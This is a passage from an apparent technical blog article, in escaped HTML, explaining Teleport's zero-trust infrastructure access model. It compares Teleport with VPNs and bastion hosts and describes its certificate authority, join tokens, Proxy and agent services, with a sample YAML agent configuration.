&lt;p&gt;&lt;strong&gt;How it works:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;User SSHs into bastion
&lt;/li&gt;
&lt;li&gt;Then hops into internal servers/databases
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Limitations:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Still relies on SSH keys or static credentials
&lt;/li&gt;
&lt;li&gt;Bastion becomes a high-value attack target
&lt;/li&gt;
&lt;li&gt;Limited protocol support beyond SSH
&lt;/li&gt;
&lt;li&gt;Session recording and auditing require extra tooling
&lt;/li&gt;
&lt;li&gt;Scaling bastions across regions is operationally complex&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Teleport Model (Zero Trust Access Plane)
&lt;/h3&gt;

&lt;p&gt;Teleport replaces perimeter-based access with certificate-based, identity-aware access.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it works:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Users authenticate via SSO + MFA
&lt;/li&gt;
&lt;li&gt;Teleport issues short-lived certificates
&lt;/li&gt;
&lt;li&gt;Proxy routes access to specific approved resources
&lt;/li&gt;
&lt;li&gt;Every session is recorded and audited
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Key Advantages:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;No VPN required &lt;strong&gt;for infrastructure access&lt;/strong&gt; — Teleport eliminates the VPN for SSH, databases, Kubernetes, and applications; organizations may still use VPNs for legacy systems, unsupported protocols, or east-west traffic patterns&lt;/li&gt;
&lt;li&gt;No inbound firewall rules (reverse tunnels)
&lt;/li&gt;
&lt;li&gt;Identity-based access, not network-based trust
&lt;/li&gt;
&lt;li&gt;Works across SSH, Kubernetes, databases, apps, desktops
&lt;/li&gt;
&lt;li&gt;Built-in audit logs, session playback, access requests
&lt;/li&gt;
&lt;li&gt;Credentials expire automatically (zero standing privileges)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Quick Comparison Table
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;VPN&lt;/th&gt;
&lt;th&gt;Bastion Host&lt;/th&gt;
&lt;th&gt;Teleport&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Trust Model&lt;/td&gt;
&lt;td&gt;Network perimeter&lt;/td&gt;
&lt;td&gt;Jump-box perimeter&lt;/td&gt;
&lt;td&gt;Zero Trust identity-based&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Credentials&lt;/td&gt;
&lt;td&gt;Long-lived&lt;/td&gt;
&lt;td&gt;SSH keys&lt;/td&gt;
&lt;td&gt;Short-lived certificates&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Access Scope&lt;/td&gt;
&lt;td&gt;Broad subnet access&lt;/td&gt;
&lt;td&gt;Host-level&lt;/td&gt;
&lt;td&gt;Resource + role scoped&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Auditability&lt;/td&gt;
&lt;td&gt;Weak&lt;/td&gt;
&lt;td&gt;Limited&lt;/td&gt;
&lt;td&gt;Full session + event audit&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Protocol Support&lt;/td&gt;
&lt;td&gt;Any network traffic&lt;/td&gt;
&lt;td&gt;Mostly SSH&lt;/td&gt;
&lt;td&gt;SSH, DB, K8s, Apps, RDP&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Firewall Exposure&lt;/td&gt;
&lt;td&gt;Requires network access&lt;/td&gt;
&lt;td&gt;Bastion exposed inbound&lt;/td&gt;
&lt;td&gt;Only Proxy exposed inbound&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Privilege Escalation&lt;/td&gt;
&lt;td&gt;Manual&lt;/td&gt;
&lt;td&gt;Manual&lt;/td&gt;
&lt;td&gt;Built-in Access Requests&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Teleport modernizes infrastructure access by eliminating static credentials, reducing attack surface, and making access fully observable and time-bounded.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Teleport doesn't just replace SSH — it replaces the idea that networks should be trusted.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;↑ Back to top&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Fundamental Architecture Concepts
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Non-Obvious Insight: Teleport Shifts the Trust Boundary
&lt;/h3&gt;

&lt;p&gt;Most infrastructure security improvements add controls &lt;em&gt;on top of&lt;/em&gt; an existing trust model. Teleport does something more fundamental — it shifts where trust lives.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Model&lt;/th&gt;
&lt;th&gt;What Is Trusted&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;VPN&lt;/td&gt;
&lt;td&gt;The network — if you're "inside", you're trusted&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Bastion host&lt;/td&gt;
&lt;td&gt;The jump box — SSH to it, then you're trusted&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Teleport&lt;/td&gt;
&lt;td&gt;Identity + device + time — the network is &lt;em&gt;never&lt;/em&gt; trusted&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Traditional systems ask: &lt;em&gt;"Is this request coming from the right network?"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Teleport asks: &lt;em&gt;"Is this a valid identity, with the right role, on an approved device, within a valid time window?"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;This shift has a non-obvious consequence: &lt;strong&gt;Teleport makes your infrastructure location-independent by design.&lt;/strong&gt; A contractor on a coffee shop WiFi, a CI pipeline in a cloud VM, and an on-call engineer on a home network all authenticate through the same identity-first path — with no VPN, no static keys, and no network-level exceptions to manage. The network becomes a commodity transport layer, not a security boundary.&lt;/p&gt;

&lt;p&gt;This is what "zero trust" actually means in practice — not a product category, but a fundamental reorientation of where the perimeter lives.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Cluster: Foundation of Teleport's Security Model
&lt;/h3&gt;

&lt;p&gt;The cluster is the foundational concept in Teleport's architecture. A Teleport cluster is a logically grouped collection of services and resources that share a common certificate authority and security boundary.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3hg102yenj0h2fcnng3z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3hg102yenj0h2fcnng3z.png" alt="image" width="800" height="267"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key Principle&lt;/strong&gt;: Users and resources must join the same cluster before access can be granted. Teleport replaces SSH trust-on-first-use with CA-based node identity established during secure cluster join.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Certificate-Based Authentication: The Heart of Teleport
&lt;/h3&gt;

&lt;p&gt;Teleport operates as a certificate authority (CA) that issues short-lived certificates to both users and infrastructure resources. This is fundamentally different from traditional password or SSH key-based authentication.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffn51xq65kcg6y0cekgm5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffn51xq65kcg6y0cekgm5.png" alt="image" width="800" height="598"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why Certificates?&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Cryptographically Secure&lt;/strong&gt;: Much harder to forge than passwords or simple keys&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Self-Contained&lt;/strong&gt;: Include identity, permissions, and expiration in one signed document&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Decentralized Signature Validation&lt;/strong&gt;: Each service validates the certificate independently using the CA's public key — no Auth Service round-trip per request. However, &lt;strong&gt;authorization is still based on roles and policies centrally issued by the Auth Service&lt;/strong&gt;, and revocation requires CA rotation, user lockout, or session termination rather than a simple flag flip.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Automatic Expiration&lt;/strong&gt;: Expiration reduces reliance on revocation, though Teleport supports revocation mechanisms when needed&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Scalable&lt;/strong&gt;: Suitable for large deployments with many services&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Short-Lived Certificates and Zero Standing Privileges
&lt;/h3&gt;

&lt;p&gt;Teleport issues certificates with very short time-to-live (TTL) periods, typically a few hours (configurable via max_session_ttl). Access Requests may issue certificates for minutes or hours, and bot tokens often use much shorter TTLs. This creates a "zero standing privileges" model where access automatically expires.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fupbym0v9gkpv78knjbi7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fupbym0v9gkpv78knjbi7.png" alt="image" width="800" height="1576"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Benefits of Short-Lived Certificates:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The security properties described above compound into practical operational wins: a stolen certificate expires on its own, offboarding requires no key revocation sweep, there's no accumulation of forgotten credentials across systems, and every access event is time-bounded by design — making compliance audits straightforward. The explicit revocation mechanisms (CA rotation, user lockout, session termination) exist for immediate invalidation when you can't wait for TTL expiry.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Secure Node Enrollment (Join Tokens)
&lt;/h3&gt;

&lt;p&gt;A critical aspect of Teleport's security model is how agents and nodes securely join the cluster. This process establishes the initial trust relationship that underpins all subsequent certificate-based authentication.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Join Process:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Token Generation&lt;/strong&gt;: Admin creates a join token via the Auth Service&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Token Types&lt;/strong&gt;: 

&lt;ul&gt;
&lt;li&gt;Static tokens (for testing/development)&lt;/li&gt;
&lt;li&gt;Dynamic tokens (one-time use, expire after period)&lt;/li&gt;
&lt;li&gt;Provisioning tokens (AWS IAM, Azure AD, GCP identity)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secure Bootstrap&lt;/strong&gt;: Node uses token to prove its identity to Auth Service&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CA Pinning&lt;/strong&gt;: Node receives and pins the cluster CA public key&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Certificate Issuance&lt;/strong&gt;: Auth Service issues node certificate after successful validation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Continuous Identity&lt;/strong&gt;: Node uses certificate for all subsequent cluster interactions&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Security Considerations:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Join tokens should be treated as highly sensitive credentials&lt;/li&gt;
&lt;li&gt;Use dynamic, short-lived tokens in production&lt;/li&gt;
&lt;li&gt;Leverage cloud provider identity (IAM roles) for automated, secure joins&lt;/li&gt;
&lt;li&gt;Monitor join events in audit logs&lt;/li&gt;
&lt;li&gt;Rotate join tokens regularly&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This secure enrollment process ensures that even before certificate-based authentication begins, nodes have established verifiable trust with the cluster, eliminating the trust-on-first-use problem entirely.&lt;/p&gt;

&lt;p&gt;↑ Back to top&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Teleport Architecture Deep Dive
&lt;/h2&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Control Plane vs Traffic Plane Separation
&lt;/h3&gt;

&lt;p&gt;Teleport separates &lt;strong&gt;authority and policy decisions&lt;/strong&gt; from &lt;strong&gt;session traffic handling&lt;/strong&gt;:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Control Plane (Authority &amp;amp; State):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Auth Service: Certificate issuance, identity management, RBAC, policy evaluation&lt;/li&gt;
&lt;li&gt;Backend storage: Cluster state, audit logs, session metadata&lt;/li&gt;
&lt;li&gt;Management operations: User, role, and policy configuration&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Traffic Plane (Session Path):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Proxy Service: Public gateway, client termination, policy enforcement, session routing and recording&lt;/li&gt;
&lt;li&gt;Teleport Agents: Protocol-specific access to infrastructure resources&lt;/li&gt;
&lt;li&gt;Session data: Live SSH, Kubernetes, database, application, and desktop traffic&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The Auth Service never handles interactive traffic directly. All live sessions flow through the Proxy and Agents, using short-lived certificates issued by the Auth Service.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Core Components
&lt;/h3&gt;

&lt;p&gt;Teleport's architecture consists of three main components that work together to provide secure infrastructure access:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhou0bfrjm12z2nigfj9x.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhou0bfrjm12z2nigfj9x.png" alt="image" width="800" height="360"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Auth Service: The Certificate Authority
&lt;/h3&gt;

&lt;p&gt;The Auth Service is the brain of a Teleport cluster. It performs three critical functions:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Certificate Authority Management:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Maintains multiple internal certificate authorities for different purposes (host CA, user CA, database CA, etc.)&lt;/li&gt;
&lt;li&gt;Signs certificates for users and services joining the cluster&lt;/li&gt;
&lt;li&gt;Performs certificate rotation to invalidate old certificates&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Identity and Access Management:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Integrates with SSO providers (Okta, GitHub, Google Workspace, Active Directory)&lt;/li&gt;
&lt;li&gt;Manages local users and roles&lt;/li&gt;
&lt;li&gt;Enforces Role-Based Access Control (RBAC)&lt;/li&gt;
&lt;li&gt;Issues temporary access through Access Requests&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Audit and Compliance:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Collects audit events from all cluster components&lt;/li&gt;
&lt;li&gt;Coordinates session recording storage&lt;/li&gt;
&lt;li&gt;Maintains comprehensive audit logs of all access and actions&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnj7kqcpk142xu1uuety9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnj7kqcpk142xu1uuety9.png" alt="image" width="800" height="276"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Backend Storage Options:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The Auth Service uses pluggable backend storage for cluster state and audit data:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;DynamoDB + S3&lt;/strong&gt;: AWS-native option (state in DynamoDB, recordings/logs in S3)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PostgreSQL&lt;/strong&gt;: Self-hosted relational database option&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;etcd&lt;/strong&gt;: High-availability key-value store&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Firestore&lt;/strong&gt;: Used by Teleport Cloud&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Choose based on your infrastructure, performance requirements, and operational preferences.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;In practice:&lt;/strong&gt; DynamoDB + S3 is the most operationally scalable choice on AWS — it offloads capacity management and delivers predictable performance at scale. PostgreSQL is preferred for portability and on-prem deployments, but requires careful tuning (connection pooling, vacuuming, index maintenance) at scale. etcd is generally only appropriate if you're already operating it for Kubernetes and want a unified store for small deployments. Firestore is used by Teleport Cloud.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Proxy Service: The Access Gateway
&lt;/h3&gt;

&lt;p&gt;The Proxy Service is the public-facing component that users and clients interact with. It serves as the gateway into the Teleport cluster.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key Responsibilities:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Public Access Point:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Provides HTTPS endpoint for web UI and API&lt;/li&gt;
&lt;li&gt;Terminates TLS connections&lt;/li&gt;
&lt;li&gt;Serves as single point of entry for all access&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Connection Routing:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Maintains reverse tunnel connections from all agents&lt;/li&gt;
&lt;li&gt;Routes user connections to appropriate backend resources&lt;/li&gt;
&lt;li&gt;Load balances across multiple agent instances&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Session Management:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Proxies SSH, Kubernetes, database, and application protocols&lt;/li&gt;
&lt;li&gt;Coordinates session recording&lt;/li&gt;
&lt;li&gt;Manages concurrent session limits&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Web Interface:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Hosts web-based terminal and management UI&lt;/li&gt;
&lt;li&gt;Provides resource discovery and selection&lt;/li&gt;
&lt;li&gt;Displays audit logs and session recordings&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdwrapuw1xmzsf15z3a2a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdwrapuw1xmzsf15z3a2a.png" alt="image" width="800" height="546"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why Reverse Tunnels?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Traditional architectures require opening inbound firewall rules to resources. Teleport's reverse tunnel approach means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;No Inbound Firewall Rules&lt;/strong&gt;: Agents connect outbound to Proxy&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;NAT Traversal&lt;/strong&gt;: Works behind NAT and restrictive firewalls&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Private Network Access&lt;/strong&gt;: Reach resources in private subnets without VPN&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Simplified Security&lt;/strong&gt;: Only Proxy needs public IP and open ports&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Teleport Agents: Protocol-Specific Services
&lt;/h3&gt;

&lt;p&gt;Agents run alongside infrastructure resources and handle protocol-specific access. Each agent type specializes in a particular protocol or resource type.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Agent Types:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;SSH Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Provides SSH access to Linux/Unix servers&lt;/li&gt;
&lt;li&gt;Provides an SSH proxy service that supports OpenSSH clients and Teleport-issued certificates&lt;/li&gt;
&lt;li&gt;Supports standard SSH features (port forwarding, SCP, SFTP)&lt;/li&gt;
&lt;li&gt;Records session activity&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Kubernetes Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Provides access to Kubernetes clusters&lt;/li&gt;
&lt;li&gt;Proxies kubectl commands and API requests&lt;/li&gt;
&lt;li&gt;Enforces Kubernetes RBAC alongside Teleport RBAC&lt;/li&gt;
&lt;li&gt;Audits all Kubernetes API calls&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Database Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Provides access to databases (PostgreSQL, MySQL, MongoDB, etc.)&lt;/li&gt;
&lt;li&gt;Issues short-lived database credentials&lt;/li&gt;
&lt;li&gt;Audits database access sessions and connection metadata. Query-level visibility is &lt;strong&gt;engine-dependent&lt;/strong&gt; — some engines support query capture natively, others require additional configuration or native database auditing alongside Teleport.&lt;/li&gt;
&lt;li&gt;Supports secure proxying and connection multiplexing&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Application Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Provides access to internal web applications&lt;/li&gt;
&lt;li&gt;Handles HTTP/HTTPS proxying&lt;/li&gt;
&lt;li&gt;Supports header-based authentication&lt;/li&gt;
&lt;li&gt;Enables access to web apps without VPN&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Desktop Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Provides RDP access to Windows machines&lt;/li&gt;
&lt;li&gt;Records desktop sessions&lt;/li&gt;
&lt;li&gt;Supports clipboard and file transfer&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1an6sjlg7gws0o9ml6vu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1an6sjlg7gws0o9ml6vu.png" alt="image" width="800" height="166"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Multi-Service Agents:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A single agent process can run multiple services simultaneously:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Agent running SSH, DB, and App services&lt;/span&gt;
&lt;span class="na"&gt;teleport&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;auth_token&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;xyz789"&lt;/span&gt;
  &lt;span class="na"&gt;proxy_server&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;proxy.example.com:443"&lt;/span&gt;

&lt;span class="na"&gt;ssh_service&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;

&lt;span class="na"&gt;db_service&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;databases&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;prod-postgres"&lt;/span&gt;
    &lt;span class="na"&gt;protocol&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;postgres"&lt;/span&gt;
    &lt;span class="na"&gt;uri&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;postgres.internal:5432"&lt;/span&gt;

&lt;span class="na"&gt;app_service&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;apps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;internal-dashboard"&lt;/span&gt;
    &lt;span class="na"&gt;uri&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;http://localhost:8080"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Unified Resource Inventory and Discovery
&lt;/h3&gt;

&lt;p&gt;Teleport maintains a dynamic inventory of all infrastructure resources across the cluster. This provides a centralized catalog of what exists and what users can access.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Resource Catalog Features:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Automatic Discovery&lt;/strong&gt;: Agents can auto-discover resources (EC2 instances, RDS databases, EKS clusters)&lt;/li&gt;
&lt;li&gt;
